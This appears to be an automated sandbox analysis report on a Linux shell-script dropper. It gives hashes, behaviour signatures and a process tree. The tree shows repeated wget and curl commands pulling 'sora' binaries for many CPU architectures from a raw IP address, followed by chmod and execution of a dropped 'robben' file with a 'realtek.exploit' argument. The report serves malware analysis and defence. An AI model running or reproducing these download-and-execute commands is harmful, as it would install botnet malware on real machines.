Analysis

  • max time kernel
    10s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    18/10/2024, 02:36

General

  • Target

    bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh

  • Size

    2KB

  • MD5

    2a963ff4fb99086ab454f4f26acf8b74

  • SHA1

    0830412185a29f4230a85d8f6eb4d15f2a165aea

  • SHA256

    bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1

  • SHA512

    7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
    /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
    1⤵
    • Writes file to tmp directory
    PID:1518
    • /usr/bin/wget
      wget http://93.123.85.141/bins/sora.x86
      2⤵
        PID:1519
      • /usr/bin/curl
        curl -O http://93.123.85.141/bins/sora.x86
        2⤵
          PID:1520
        • /bin/cat
          cat sora.x86
          2⤵
            PID:1521
          • /bin/chmod
            chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
            2⤵
            • File and Directory Permissions Modification
            PID:1522
          • /tmp/robben
            ./robben realtek.exploit
            2⤵
            • Executes dropped EXE
            PID:1523
          • /usr/bin/wget
            wget http://93.123.85.141/bins/sora.mips
            2⤵
            • System Network Configuration Discovery
            PID:1525
          • /usr/bin/curl
            curl -O http://93.123.85.141/bins/sora.mips
            2⤵
            • System Network Configuration Discovery
            PID:1529
          • /bin/cat
            cat sora.mips
            2⤵
            • System Network Configuration Discovery
            PID:1530
          • /bin/chmod
            chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
            2⤵
            • File and Directory Permissions Modification
            PID:1531
          • /tmp/robben
            ./robben realtek.exploit
            2⤵
            • Executes dropped EXE
            PID:1532
          • /usr/bin/wget
            wget http://93.123.85.141/bins/sora.x86_64
            2⤵
              PID:1534
            • /usr/bin/curl
              curl -O http://93.123.85.141/bins/sora.x86_64
              2⤵
                PID:1535
              • /bin/cat
                cat sora.x86_64
                2⤵
                  PID:1536
                • /bin/chmod
                  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1537
                • /tmp/robben
                  ./robben realtek.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:1538
                • /usr/bin/wget
                  wget http://93.123.85.141/bins/sora.i468
                  2⤵
                    PID:1540
                  • /usr/bin/curl
                    curl -O http://93.123.85.141/bins/sora.i468
                    2⤵
                      PID:1541
                    • /bin/cat
                      cat sora.i468
                      2⤵
                        PID:1542
                      • /bin/chmod
                        chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1543
                      • /tmp/robben
                        ./robben realtek.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:1544
                      • /usr/bin/wget
                        wget http://93.123.85.141/bins/sora.i686
                        2⤵
                          PID:1546
                        • /usr/bin/curl
                          curl -O http://93.123.85.141/bins/sora.i686
                          2⤵
                            PID:1547
                          • /bin/cat
                            cat sora.i686
                            2⤵
                              PID:1548
                            • /bin/chmod
                              chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1549
                            • /tmp/robben
                              ./robben realtek.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:1550
                            • /usr/bin/wget
                              wget http://93.123.85.141/bins/sora.mpsl
                              2⤵
                                PID:1552
                              • /usr/bin/curl
                                curl -O http://93.123.85.141/bins/sora.mpsl
                                2⤵
                                  PID:1553
                                • /bin/cat
                                  cat sora.mpsl
                                  2⤵
                                    PID:1554
                                  • /bin/chmod
                                    chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:1555
                                  • /tmp/robben
                                    ./robben realtek.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1556
                                  • /usr/bin/wget
                                    wget http://93.123.85.141/bins/sora.arm4
                                    2⤵
                                      PID:1558
                                    • /usr/bin/curl
                                      curl -O http://93.123.85.141/bins/sora.arm4
                                      2⤵
                                        PID:1559
                                      • /bin/cat
                                        cat sora.arm4
                                        2⤵
                                          PID:1560
                                        • /bin/chmod
                                          chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:1561
                                        • /tmp/robben
                                          ./robben realtek.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1562
                                        • /usr/bin/wget
                                          wget http://93.123.85.141/bins/sora.arm5
                                          2⤵
                                            PID:1564
                                          • /usr/bin/curl
                                            curl -O http://93.123.85.141/bins/sora.arm5
                                            2⤵
                                              PID:1565
                                            • /bin/cat
                                              cat sora.arm5
                                              2⤵
                                                PID:1566
                                              • /bin/chmod
                                                chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:1567
                                              • /tmp/robben
                                                ./robben realtek.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1568
                                              • /usr/bin/wget
                                                wget http://93.123.85.141/bins/sora.arm6
                                                2⤵
                                                  PID:1570
                                                • /usr/bin/curl
                                                  curl -O http://93.123.85.141/bins/sora.arm6
                                                  2⤵
                                                    PID:1571
                                                  • /bin/cat
                                                    cat sora.arm6
                                                    2⤵
                                                      PID:1572
                                                    • /bin/chmod
                                                      chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:1573
                                                    • /tmp/robben
                                                      ./robben realtek.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1574
                                                    • /usr/bin/wget
                                                      wget http://93.123.85.141/bins/sora.arm7
                                                      2⤵
                                                        PID:1576
                                                      • /usr/bin/curl
                                                        curl -O http://93.123.85.141/bins/sora.arm7
                                                        2⤵
                                                          PID:1577
                                                        • /bin/cat
                                                          cat sora.arm7
                                                          2⤵
                                                            PID:1578
                                                          • /bin/chmod
                                                            chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:1579
                                                          • /tmp/robben
                                                            ./robben realtek.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1580
                                                          • /usr/bin/wget
                                                            wget http://93.123.85.141/bins/sora.ppc
                                                            2⤵
                                                              PID:1582
                                                            • /usr/bin/curl
                                                              curl -O http://93.123.85.141/bins/sora.ppc
                                                              2⤵
                                                                PID:1583
                                                              • /bin/cat
                                                                cat sora.ppc
                                                                2⤵
                                                                  PID:1584
                                                                • /bin/chmod
                                                                  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:1585
                                                                • /tmp/robben
                                                                  ./robben realtek.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:1586
                                                                • /usr/bin/wget
                                                                  wget http://93.123.85.141/bins/sora.ppc440fp
                                                                  2⤵
                                                                    PID:1588
                                                                  • /usr/bin/curl
                                                                    curl -O http://93.123.85.141/bins/sora.ppc440fp
                                                                    2⤵
                                                                      PID:1589
                                                                    • /bin/cat
                                                                      cat sora.ppc440fp
                                                                      2⤵
                                                                        PID:1590
                                                                      • /bin/chmod
                                                                        chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:1591
                                                                      • /tmp/robben
                                                                        ./robben realtek.exploit
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:1592
                                                                      • /usr/bin/wget
                                                                        wget http://93.123.85.141/bins/sora.m68k
                                                                        2⤵
                                                                          PID:1594
                                                                        • /usr/bin/curl
                                                                          curl -O http://93.123.85.141/bins/sora.m68k
                                                                          2⤵
                                                                            PID:1595
                                                                          • /bin/cat
                                                                            cat sora.m68k
                                                                            2⤵
                                                                              PID:1596
                                                                            • /bin/chmod
                                                                              chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                                              2⤵
                                                                              • File and Directory Permissions Modification
                                                                              PID:1597
                                                                            • /tmp/robben
                                                                              ./robben realtek.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:1598
                                                                            • /usr/bin/wget
                                                                              wget http://93.123.85.141/bins/sora.sh4
                                                                              2⤵
                                                                                PID:1600
                                                                              • /usr/bin/curl
                                                                                curl -O http://93.123.85.141/bins/sora.sh4
                                                                                2⤵
                                                                                  PID:1601
                                                                                • /bin/cat
                                                                                  cat sora.sh4
                                                                                  2⤵
                                                                                    PID:1602
                                                                                  • /bin/chmod
                                                                                    chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya
                                                                                    2⤵
                                                                                    • File and Directory Permissions Modification
                                                                                    PID:1603
                                                                                  • /tmp/robben
                                                                                    ./robben realtek.exploit
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1604

                                                                                Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads